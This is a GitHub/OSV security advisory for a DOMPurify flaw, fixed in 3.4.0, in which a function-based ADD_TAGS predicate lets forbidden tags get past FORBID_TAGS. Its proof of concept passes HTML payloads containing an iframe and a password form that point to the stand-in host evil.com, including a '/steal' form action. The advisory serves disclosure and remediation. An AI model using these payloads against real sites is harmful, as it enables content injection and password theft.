GHSA-h7mw-gpvr-xq4m

Source
https://github.com/advisories/GHSA-h7mw-gpvr-xq4m
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-h7mw-gpvr-xq4m/GHSA-h7mw-gpvr-xq4m.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-h7mw-gpvr-xq4m
Aliases
Downstream
Related
Published
2026-04-22T17:34:17Z
Modified
2026-05-05T16:42:34.505849Z
Severity
  • 6.0 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
Summary
DOMPurify: FORBID_TAGS bypassed by function-based ADD_TAGS predicate (asymmetry with FORBID_ATTR fix)
Details

There is an inconsistency between FORBID_TAGS and FORBID_ATTR handling when a function-based ADD_TAGS predicate is used.

Commit c361baa added an early exit for FORBID_ATTR at line 1214:

/* FORBID_ATTR must always win, even if ADD_ATTR predicate would allow it */
if (FORBID_ATTR[lcName]) {
  return false;
}

The same fix was not applied to FORBID_TAGS. At lines 1118-1123, when EXTRA_ELEMENT_HANDLING.tagCheck returns true, the short-circuit evaluation skips the FORBID_TAGS check entirely:

if (
  !(
    EXTRA_ELEMENT_HANDLING.tagCheck instanceof Function &&
    EXTRA_ELEMENT_HANDLING.tagCheck(tagName)  // true -> short-circuits
  ) &&
  (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])  // never evaluated
) {

This allows forbidden elements to survive sanitization with their attributes intact.

PoC (tested against current HEAD in Node.js + jsdom):

// Setup: DOMPurify's CommonJS build exports a factory that takes a window;
// jsdom supplies one outside the browser.
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');
const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);

DOMPurify.sanitize(
  '<iframe src="https://evil.com"></iframe>',
  {
    ADD_TAGS: function(tag) { return true; },
    FORBID_TAGS: ['iframe']
  }
);
// Returns: '<iframe src="https://evil.com"></iframe>'
// Expected: '' (iframe forbidden)

DOMPurify.sanitize(
  '<form action="https://evil.com/steal"><input name=password></form>',
  {
    ADD_TAGS: function(tag) { return true; },
    FORBID_TAGS: ['form']
  }
);
// Returns: '<form action="https://evil.com/steal"><input name="password"></form>'
// Expected: '<input name="password">' (form forbidden)

Confirmed affected: iframe, object, embed, form. The src/action/data attributes survive because attribute sanitization runs separately and allows these URLs.

Compare with FORBID_ATTR which correctly wins:

DOMPurify.sanitize(
  '<p onclick="alert(1)">hello</p>',
  {
    ADD_ATTR: function(attr) { return true; },
    FORBID_ATTR: ['onclick']
  }
);
// Returns: '<p>hello</p>' (onclick correctly removed)

Suggested fix: add FORBID_TAGS early exit before the tagCheck evaluation, mirroring line 1214:

/* FORBID_TAGS must always win, even if ADD_TAGS predicate would allow it */
if (FORBID_TAGS[tagName]) {
  // proceed to removal logic
}

This requires a function-based ADD_TAGS in the config, which is uncommon. But the asymmetry with the FORBID_ATTR fix is clear, and the impact includes iframe and form injection with external URLs.

Reporter: Koda Reef

Database specific
{
    "nvd_published_at": "2026-04-23T16:16:26Z",
    "github_reviewed": true,
    "severity": "MODERATE",
    "cwe_ids": [
        "CWE-183",
        "CWE-79"
    ],
    "github_reviewed_at": "2026-04-22T17:34:17Z"
}
References

Affected packages

npm / dompurify

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
3.4.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-h7mw-gpvr-xq4m/GHSA-h7mw-gpvr-xq4m.json"